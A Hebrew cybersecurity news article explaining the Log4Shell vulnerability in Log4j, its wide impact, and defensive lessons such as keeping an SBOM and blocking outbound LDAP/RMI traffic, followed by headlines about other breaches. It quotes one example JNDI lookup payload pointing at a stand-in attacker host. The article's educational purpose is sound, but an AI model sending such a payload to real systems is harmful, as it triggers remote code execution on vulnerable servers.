ניתוח אירוע: Log4Shell — החולשה ששיתקה את האינטרנט (CVE-2021-44228)
צוות CyberHub · לפני 14 ימים · 1 דק׳ קריאה
TL;DR · בקצרה
בדצמבר 2021 התגלתה חולשה בספריית Log4j (Java) שאיפשרה הרצת קוד מרחוק בשורה אחת. כי הספרייה נמצאת בכל מקום — חצי האינטרנט היה פגיע בן-לילה.
💼 למי שעובד במקצוע
מפתחים/DevOps: החזיקו SBOM מעודכן כדי לדעת בדקות אם רכיב פגיע נמצא אצלכם. אל תתעדו קלט משתמש גולמי ללוג בלי סינון. צוותי הגנה: חסמו תעבורת LDAP/RMI יוצאת מהשרתים.
בדצמבר 2021 העולם הטכנולוגי עצר את הנשימה. חולשה במנגנון תיעוד (logging) נפוץ ב-Java בשם Log4j קיבלה ציון CVSS של 10.0 — המקסימום.
מה קרה?
Log4j אפשרה "תחליפים" (lookups) בתוך הודעות לוג. תוקף יכל לשלוח מחרוזת תמימה-לכאורה כמו ${jndi:ldap://evil.com/x} — ואם היא נכתבה ללוג, השרת היה מוריד ומריץ קוד מהשרת של התוקף. שורה אחת = הרצת קוד מרחוק (RCE).
למה זה היה כל כך נורא?
Log4j נמצאת בעשרות אלפי יישומי Java — שרתים, מצלמות, שירותי ענן, אפילו Minecraft. רוב הארגונים לא ידעו בכלל שהיא אצלם (תלות עקיפה).
🔍 תובנות / מה למדנו
- שרשרת אספקה = משטח תקיפה. אתם פגיעים לרכיבים שלא ידעתם שאתם משתמשים בהם.
- SBOM זה לא בירוקרטיה — זה הצלה. מי שהחזיק רשימת רכיבים מעודכנת ידע בדקות אם הוא חשוף; השאר חיפשו ימים.
- קלט משתמש מסוכן בכל מקום — גם בלוג. מקום שאף אחד לא חשב עליו כ"קלט".
- תיקון מהיר דורש היכרות מראש. ארגונים שידעו מה רץ אצלם תיקנו מהר; השאר נחשפו.
הלקח הגדול: עדכונים ומיפוי תלויות זה "משעמם" — עד שמגיע Log4Shell הבא.
📚 מקורות והפניות
💬 תגובות (0)
התחברו כדי להגיב.
אין עדיין תגובות. היו הראשונים! 🙂
📰 עוד חדשות
ShinyHunters ניצלו חולשה ב-Oracle PeopleSoft — אוניברסיטאות נפגעו במיוחד
קבוצת הסחיטה ShinyHunters ניצלה חולשה לא-מתוקנת ב-Oracle PeopleSoft כדי לחדור לארגונים ולגנוב מידע. הפעילות תוארכה ל-27 במאי עד 9 ביוני 2026, כשמוסדות אקדמיים ספגו את עיקר הפגיעה.
כ-30,000 חומות אש של Fortinet נמצאו חשופות לפריצה
חברת SOCRadar זיהתה כ-30,000 התקני חומת אש של Fortinet שחשופים לאינטרנט ומסכנים את הרשתות שמאחוריהם. תזכורת חדה: גם מכשירי ההגנה עצמם הם יעד.
חולשה קריטית ב-Palo Alto PAN-OS מנוצלת באופן פעיל (CVE-2026-0257)
Palo Alto Networks חשפה ניצול פעיל של CVE-2026-0257 — חולשת עקיפת-אימות ב-PAN-OS שמאפשרת גישה לא-מורשית לפורטלי GlobalProtect. CISA הוסיפה אותה לקטלוג ה-KEV.